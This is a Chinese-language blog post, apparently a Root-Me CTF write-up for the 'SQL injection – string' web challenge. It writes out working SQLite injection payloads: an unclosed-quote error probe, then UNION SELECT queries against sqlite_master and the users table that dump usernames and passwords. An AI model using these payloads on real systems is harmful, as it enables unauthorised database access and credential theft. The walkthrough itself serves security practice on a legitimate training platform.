• 如果您想对本站表示支持,请随手点击一下广告即可~
  • 本站致力于提供原创、优秀的技术文章~
  • 有任何疑问或建议 均可以在站点右侧栏处 通过各种方式联系站长哦~
  • CTF – RootMe解题报告 [Web-Server : SQL injection – string]

    渗透测试 EXP 49阅读 0评论

    挑战入口:Root-Me(https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-string)
      分类目录:Link to …(http://exp-blog.com/2019/01/02/pid-2597/12/)

    SQLi 水题。关键是找到注入点。

    查看页面源码,发现这题其实是有 3 个页面的:

    虽然三个页面都有数据库查询操作,但是测试发现注入点在 ?action=recherche 页面。


    首先确认数据库类型,输入 payload :'exp error' 故意不闭合引号,尝试令 SQL 报错。

    通过页面回显的异常信息,可以确认是 SQLite3 数据库。

    在 SQLite3 中只有一个系统隐藏表 sqlite_master ,其表结构如下:

    这张表存储了数据库中每个数据表的信息,可以通过它找到其他数据表。

    构造跨表查询 payload :exp' or 1=1 union select name, sql from sqlite_master --

    从中找到账户表及其表结构 users (CREATE TABLE users(username TEXT, password TEXT, Year INTEGER))

    进一步构造 payload 跨表查询 users 的账号信息:

    exp' or 1=1 union select username, password from users --

    得到 admin 的密码,完成挑战。


    转载请注明:EXP 技术分享博客 » CTF – RootMe解题报告 [Web-Server : SQL injection – string]

    喜欢 (0) 分享 (0)
    发表我的评论
    取消评论

    表情

    Hi,您需要填写昵称和邮箱!

    • 昵称 (必填)
    • 邮箱 (必填)
    • 网址